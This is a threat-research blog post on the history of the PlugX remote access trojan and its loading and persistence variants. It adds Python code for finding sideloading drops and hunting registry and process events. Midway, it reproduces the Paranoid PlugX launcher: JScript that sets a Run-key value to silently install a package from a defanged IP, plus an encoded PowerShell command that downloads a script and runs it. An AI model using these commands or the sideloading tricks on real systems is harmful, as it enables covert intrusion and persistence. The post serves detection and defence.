URL: https://logrhythm.com/blog/deep-dive-into-plugx-malware/

TAKE A DEEP DIVE INTO PLUGX MALWARE

Posted on April 18, 2018 | Featured
Category: LogRhythm Labs | Security Tips and Tricks | Threat Research
Type: Blog

In June 2017, Palo Alto Networks' Unit 42 threat research team published an
excellent blog post on a newly detected version of the PlugX malware family,
also known as "Korplug." Interested to find out more about this new variant, I
started digging around and found that there have been many new samples of
"PlugX v1." This isn't too surprising, considering that a builder for version
one of the malware has been publicly available for several years. However, it
piqued my curiosity, and I decided to look into where these old samples were
used and whether there was any specific targeting. From a detection standpoint,
it is always interesting to see old code repurposed or reused in new attacks
and campaigns, as seen in the resurgence of Shamoon malware in 2016.


A HISTORY OF PLUGX MALWARE

The PlugX malware family is well known to researchers, with samples dating back
to as early as 2008, according to researchers at Trend Micro. PlugX is a fully
featured Remote Access Tool/Trojan (RAT) with capabilities such as file upload,
download, and modification, keystroke logging, webcam control, and access to a
remote cmd.exe shell.

Until recently, distinct versions of PlugX malware maintained consistent
methodologies for encryption, configuration, and persistence, even as the
tool's development evolved over the years. In 2014 there was a resurgence of
this malware family, making it the most utilized family of that year according
to CrowdStrike's Global Threat Report, released in February 2015. Changes to
the command and control (C2) options contributed to this resurgence: the
malware authors implemented C2 over DNS, which made the traffic harder to
detect.

Until the end of 2016, the typical PlugX infection methodology was the same:
the payload was delivered via a phishing campaign, either as an attached
self-extracting RAR (SFX) archive, as a link to such an archive, or embedded in
a weaponized document. The archive contains the three files that make up the
PlugX components. An example of these three components is as follows (extracted
from the RAR archive with SHA-256 hash
1c0379481d17fc80b3330f148f1b87ff613cfd2a6601d97920a0bcd808c718d0):

Figure 1: PlugX Component Files

Although the above sample used an NVIDIA application, many PlugX samples of this
variant leveraged applications associated with antivirus or various other
security products. Because these executables are signed, legitimate
applications, endpoint security products are less likely to flag them.
Furthermore, usage of antivirus-related applications can potentially take
advantage of product whitelisting on the endpoint.

There have been many extensive analyses of the aforementioned PlugX variants
over the years, as is evident by the lengthy — and yet still incomplete —
references in the Appendix of this post, so I will not repeat a full analysis
here. However, a brief overview of the “original” or “classic” PlugX execution
method is available below.

Figure 2: PlugX SFX Archive Components


CLASSIC PLUGX EXECUTION METHODOLOGY

Below is a depiction of the execution methodology for the classic variant of
PlugX. Most variants roughly follow this pattern, with some deviations.
Execution flow in general proceeds as follows:

 1. The three PlugX components are extracted from the archive to a temporary
    directory on the system.
 2. The legitimate, signed program is executed. The malicious loader DLL sits
    in the same directory and carries the name of a DLL the program imports;
    because the application directory is searched before the system
    directories, the program loads the malicious DLL (DLL sideloading).
 3. The loader DLL decrypts and decompresses the payload file.
 4. The decrypted shellcode is injected into a legitimate system process.
    * Note: This step is performed in different ways (code injection, process
      hollowing) depending on the specific variant of PlugX, but the basic
      methodology is the same.
 5. The injected Windows process carries out the C2 and PlugX functionality.

Figure 3: PlugX Execution Chain
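One way to triage a suspected drop directory for this three-file pattern, as an added example that is not code from the original post: the script below classifies each file from its own bytes (a PE header marks an executable or, via the IMAGE_FILE_DLL characteristic, a DLL; anything else with Shannon entropy close to 8 bits per byte is treated as an encrypted or compressed blob) and reports any directory holding all three kinds, which is the shape left behind by steps 1 to 3 above. The paths, file names and file contents are constructed for the demo; the 7.0 entropy threshold and reading only the first 4 KB of each file are my choices. It is a triage heuristic: entropy also flags legitimate compressed files, and a fuller check would confirm that the DLL's name appears in the executable's import table and that the executable carries a valid Authenticode signature.

```python
"""Triage a directory for the classic three-file PlugX drop.

Added example; not code from the LogRhythm post. Classic PlugX lands a signed
executable, a loader DLL for it to sideload, and an encrypted/compressed
payload blob in one (usually temporary) directory. Each file is classified
from its bytes alone, and a directory containing all three kinds is reported.
"""
import math
import ntpath
import os
import random
import struct
from collections import Counter, defaultdict

IMAGE_FILE_DLL = 0x2000   # COFF Characteristics flag for a DLL image
ENTROPY_THRESHOLD = 7.0   # bits/byte; encrypted or random data sits near 8.0
HEADER_BYTES = 4096       # how much of each file to read for the check


def pe_kind(data: bytes):
    """Return 'exe', 'dll' or None using only the DOS and COFF headers."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # Characteristics is the last WORD of the 20-byte COFF header.
    characteristics = struct.unpack_from("<H", data, e_lfanew + 22)[0]
    return "dll" if characteristics & IMAGE_FILE_DLL else "exe"


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant buffer, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify(data: bytes) -> str:
    kind = pe_kind(data)
    if kind:
        return kind
    return "encrypted_blob" if shannon_entropy(data) >= ENTROPY_THRESHOLD else "other"


def find_triads(files: dict) -> list:
    """files maps a Windows path to its leading bytes.

    Returns sorted (directory, exes, dlls, blobs) tuples for directories that
    hold at least one file of each kind.
    """
    by_dir = defaultdict(lambda: defaultdict(list))
    for path, data in files.items():
        directory, name = ntpath.split(path)
        by_dir[directory][classify(data)].append(name)
    hits = []
    for directory, kinds in by_dir.items():
        if kinds["exe"] and kinds["dll"] and kinds["encrypted_blob"]:
            hits.append((directory, sorted(kinds["exe"]), sorted(kinds["dll"]),
                         sorted(kinds["encrypted_blob"])))
    return sorted(hits)


def scan_tree(root: str) -> list:
    """Run the same check over a real directory tree on the host."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "rb") as fh:
                    files[full] = fh.read(HEADER_BYTES)
            except OSError:
                continue
    return find_triads(files)


def fake_pe(is_dll: bool) -> bytes:
    """Constructed minimal PE (DOS header + COFF header) for the demo only."""
    characteristics = 0x0102 | (IMAGE_FILE_DLL if is_dll else 0)  # EXECUTABLE_IMAGE | 32BIT_MACHINE
    dos = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew: PE header right after DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, characteristics)
    return bytes(dos) + b"PE\0\0" + coff


_rng = random.Random(2018)
SAMPLE_FILES = {  # constructed: an SFX extraction into %TEMP% plus unrelated downloads
    r"C:\Users\victim\AppData\Local\Temp\RarSFX0\app.exe": fake_pe(False),
    r"C:\Users\victim\AppData\Local\Temp\RarSFX0\helper.dll": fake_pe(True),
    r"C:\Users\victim\AppData\Local\Temp\RarSFX0\data.dat": bytes(_rng.randrange(256) for _ in range(4096)),
    r"C:\Users\victim\Downloads\tool.exe": fake_pe(False),
    r"C:\Users\victim\Downloads\readme.txt": b"PlugX notes, plain text, low entropy.\n" * 64,
}

if __name__ == "__main__":
    for directory, exes, dlls, blobs in find_triads(SAMPLE_FILES):
        print(f"[!] sideload triad in {directory}: exe={exes} dll={dlls} blob={blobs}")
```

Run as-is to see the constructed sample flagged, or call scan_tree() on a user's Temp directory on a live host; it needs only the standard library.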


CORE PLUGX MALWARE FUNCTIONALITY EVOLVES

In 2013, multiple updates to the core PlugX malware functionality occurred,
including the addition of new C2 protocols, encryption, and installation
methodologies. Researchers with Airbus analyzed several samples that appeared to
be from mid-to-late 2013. These samples represented an intermediate version of
PlugX, with characteristics falling between the original “v1” and “v2” variants.

The main updates in this variant included a new, custom encryption algorithm
used for configuration data, network communications, and strings within the
binaries. Also featured in this variant was the addition of the ICMP protocol as
a new C2 methodology and a modification of the HTTP packet format. Later
versions of this variant added DNS C2 as a module.

In 2013, researchers at Lastline also detected variants that included an update
to the PlugX malware deployment and installation methodologies. Although the
dropped files and chain of execution matched that of the classic PlugX variants
(three components: legitimate executable, loader DLL, and encrypted payload),
these samples featured User Account Control (UAC) evasion functionality and an
alternative process creation mechanism using Component Object Model (COM)
objects.

Researchers at Sophos first discovered a new strain of memory-resident PlugX at
the end of 2013. The malware was discovered in a campaign exploiting a
vulnerability in the popular Japanese word processing software Ichitaro. Unlike
the classic PlugX samples that drop the three components previously discussed,
the "diskless" samples do not use the sideloading technique with a valid
executable: the loader DLL and payload are never written to disk as files. Upon
successful exploitation of the delivery document (typically a weaponized Rich
Text Format (RTF) file), the memory-resident PlugX executes shellcode that
decrypts and decompresses the payload, a masked DLL that is then loaded in
memory and executed.

While 2014 showed a great uptick in the use of PlugX in Advanced Persistent
Threat (APT) campaigns, the variants observed mostly consisted of v1/v2
“classic” samples. In 2015, however, researchers observed a few variants that
deviated from the classic execution methodology and added a new communication
methodology to the PlugX repertoire. In the beginning of 2015, researchers from
JPCERT reported on a variant of PlugX that added peer-to-peer (P2P)
functionality, allowing the malware to communicate with other infected hosts on
the local network.

Fast forward to March 2015: Carbon Black detected an additional PlugX variant
that used a different loading methodology compared to earlier samples. In this
variant, only the loader DLL and encrypted payload are dropped to the system;
the malware uses the legitimate Windows system file rundll32.exe to execute the
malicious PlugX DLL from an export rather than relying on sideloading.

In August 2015, researchers at Airbus discovered a new variant of the "original"
PlugX. This variant utilized a fourth file in the initial installation of the
RAT. This file, also embedded in the SFX RAR, is a small executable that
provides an additional execution method for the main binary. The executable
creates the registry value
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AppKey\18\ShellExecute
with data pointing to the PlugX installation binary. This registry key maps
special keyboard keys, such as the music or mail keys, to commands or programs
that execute when someone presses that key; key number 18 typically corresponds
to the "calculator" key. Once the value is set, the malware programmatically
triggers a "press" of the key, thereby executing the installation binary.
Because the value lives in the current user's hive (HKCU), no administrative
rights are needed to set it. This method effectively provides an alternative
execution of the malware chain.

As in the 2008 campaign, PlugX is often used alongside another common RAT
called Poison Ivy. In 2017, researchers from JPCERT discovered a variant of
PlugX that had code overlap with Poison Ivy in the form of a hash algorithm
used to obscure the Windows API calls in the binary. The format of the final
decrypted payload in the new samples departed from the methodology of previous
PlugX variants; instead, it mimicked that of Poison Ivy.

In June 2017, researchers at Palo Alto Networks released a review of a new PlugX
variant they detected on their networks, which they named "Paranoid PlugX." This
variant added several new mechanisms for avoiding security controls and
detection, including new methods for determining the C2 server address after
execution, a new loading methodology, and new methods for avoiding detection on
disk. Rather than dropping the executable, loader DLL, and payload to disk, this
variant used a small script (the snippet below is JScript, driving the
WScript.Shell ActiveX object) to make two attempts to download and execute the
code:

a=new ActiveXObject(WScript.Shell);
a.run('%windir%\\System32\\reg.exe add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v MSASCuiL2 /t reg_sz /d %windir%\\System32\\msiexec.exe /q /i hxxp://172.104.65\.97/Tasks.png /f', 0);window.close();
a.run('%windir%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle hidden -ep bypass -enc JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKAEkARQBYACAAJABuAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwAyAC4AMQAwADQALgA2ADUALgA5ADcALwBnAHUAZQBzAHQALgBwAHMAMQAnACkAOwAKAA==', 0);window.close();
</script>


Figure 3: Paranoid PlugX Download and Execution Script

The first command uses reg.exe to create a value named MSASCuiL2 in the current
user's "Run" key; its data makes msiexec.exe silently install (/q /i) a package
downloaded from the URL in the command, so the download and execution repeat at
every logon. The second command runs PowerShell with -ep bypass and an -enc
argument, which is the Base64 encoding of a UTF-16LE script; decoded, it uses a
WebClient DownloadString call and IEX to fetch and run a PowerShell file named
"guest.ps1" from the same IP address as the first command. In both cases, the
PlugX shellcode that ultimately executes is identical. Another feature that
distinguishes Paranoid PlugX from previous variants is that the embedded
payload is wrapped in a .NET Framework file, which has not been seen in other
samples.
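Turning the launch and persistence artifacts described above into detection logic, as an added example that is not code from the post or from the malware: the rules below run over events shaped like Sysmon Event ID 13 (registry value set) and Event ID 1 (process create) and flag (1) any value written under Explorer\AppKey\<n>\ShellExecute, the 2015 Airbus variant's launcher, (2) a Run-key value that has msiexec install a package from a URL, the first Paranoid PlugX command, (3) a PowerShell -enc argument, which is decoded from Base64/UTF-16LE and scanned for download-and-execute cmdlets, the second Paranoid PlugX command, and (4) rundll32 calling an export of a DLL in a user-writable directory, the 2015 Carbon Black variant's execution method (that the dropped loader sits in a user-writable path is my assumption; the post does not say where it was dropped). Every event is constructed; the field names follow Sysmon's schema, and the encoded PowerShell string is the one printed in the figure above.

```python
"""Hunt for PlugX launch and persistence artifacts in Sysmon-shaped events.

Added example; not code from the LogRhythm post or from PlugX. Field names
follow Sysmon (EventID 13 = registry value set, EventID 1 = process create);
every event in EVENTS is constructed for the demo.
"""
import base64
import re

# The -enc argument exactly as printed in the Paranoid PlugX figure above.
PARANOID_ENC = "JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKAEkARQBYACAAJABuAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwAyAC4AMQAwADQALgA2ADUALgA5ADcALwBnAHUAZQBzAHQALgBwAHMAMQAnACkAOwAKAA=="

USER_HIVE = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"   # constructed
EVENTS = [
    # 2015 Airbus variant: the fourth file sets AppKey 18's ShellExecute value
    {"EventID": 13, "Image": r"C:\Users\victim\AppData\Local\Temp\RarSFX0\launch.exe",
     "TargetObject": USER_HIVE + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\AppKey\18\ShellExecute",
     "Details": r"C:\Users\victim\AppData\Local\Temp\RarSFX0\app.exe"},
    # Paranoid PlugX stage 1: Run value whose data is a remote msiexec install
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": USER_HIVE + r"\Software\Microsoft\Windows\CurrentVersion\Run\MSASCuiL2",
     "Details": r"%windir%\System32\msiexec.exe /q /i hxxp://172.104.65\.97/Tasks.png"},
    # Paranoid PlugX stage 2: encoded PowerShell downloader
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -WindowStyle hidden -ep bypass -enc " + PARANOID_ENC},
    # 2015 Carbon Black variant: rundll32 calling an export of a dropped DLL
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\ProgramData\Update\core.dll,Start"},
    # Benign noise that must not fire
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": USER_HIVE + r"\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\victim\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

APPKEY_RE = re.compile(r"\\Explorer\\AppKey\\(\d+)\\ShellExecute$", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\([^\\]+)$", re.I)
# Accept both live (http) and report-defanged (hxxp) URLs in value data.
REMOTE_MSI_RE = re.compile(r"msiexec(?:\.exe)?\b.*\s/i\s+h(?:tt|xx)ps?://", re.I)
# -e, -ec, -enc, -EncodedCommand ... followed by a Base64 blob; -ep bypass does not match.
ENC_PS_RE = re.compile(r"-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+\.dll)', re.I)
USER_WRITABLE_RE = re.compile(r"\\(?:Temp|AppData|ProgramData|Users\\Public)\\", re.I)


def decode_encoded_command(b64: str) -> str:
    """powershell -EncodedCommand carries the script as Base64 of UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def check_registry(ev: dict):
    target = ev.get("TargetObject") or ""
    details = ev.get("Details") or ""
    m = APPKEY_RE.search(target)
    if m:
        return f"AppKey {m.group(1)} ShellExecute set to {details} by {ev.get('Image')}"
    m = RUN_KEY_RE.search(target)
    if m and REMOTE_MSI_RE.search(details):
        return f"Run value {m.group(1)} installs an MSI from a URL: {details}"
    return None


def check_process(ev: dict):
    cmd = ev.get("CommandLine") or ""
    m = ENC_PS_RE.search(cmd)
    if m and "powershell" in cmd.lower():
        try:
            script = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            return f"PowerShell -enc argument that does not decode: {m.group(1)[:24]}..."
        if re.search(r"DownloadString|DownloadFile|Invoke-Expression|\bIEX\b", script, re.I):
            return f"Encoded PowerShell downloader: {script.strip()!r}"
    m = RUNDLL_RE.search(cmd)
    if m and USER_WRITABLE_RE.search(m.group(1)):
        return f"rundll32 loading {m.group(1)} from a user-writable directory"
    return None


def hunt(events: list) -> list:
    """Return (event index, finding) for every event a rule fires on."""
    findings = []
    for i, ev in enumerate(events):
        hit = check_registry(ev) if ev.get("EventID") == 13 else check_process(ev)
        if hit:
            findings.append((i, hit))
    return findings


if __name__ == "__main__":
    for index, finding in hunt(EVENTS):
        print(f"[event {index}] {finding}")
```

The AppKey rule fires on any writer, since legitimate software almost never touches those values; the Run-key rule deliberately keys on msiexec fetching from a URL rather than on the value name, which an attacker can change freely.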


TIMELINE OF PLUGX VARIANTS

The following is a rough timeline that illustrates when samples of the variants
discussed were initially reported publicly. Note: The dates below correspond to
detection/reporting of samples displaying the stated functionality — the actual
samples referenced may have compilation or creation dates earlier than those
listed below.

Figure 4: PlugX History Timeline


PLUGX REMAINS A THREAT

Although there have been several variants over the years, an analysis of the
timeline of variants discussed demonstrates the “original” PlugX variant
continues to be used today. Despite the evolution of PlugX methodologies and
techniques, these classic PlugX samples remain successful and are still utilized
in adversarial campaigns as a result.

In conducting this research, I found a wealth of information from different
research groups published over the last eight years. While this is by no means
inclusive of all PlugX research conducted, the resources cover many of the
highlights of the malware’s evolution over the years.

The sources for the PlugX variants mentioned above are linked from the original
post.
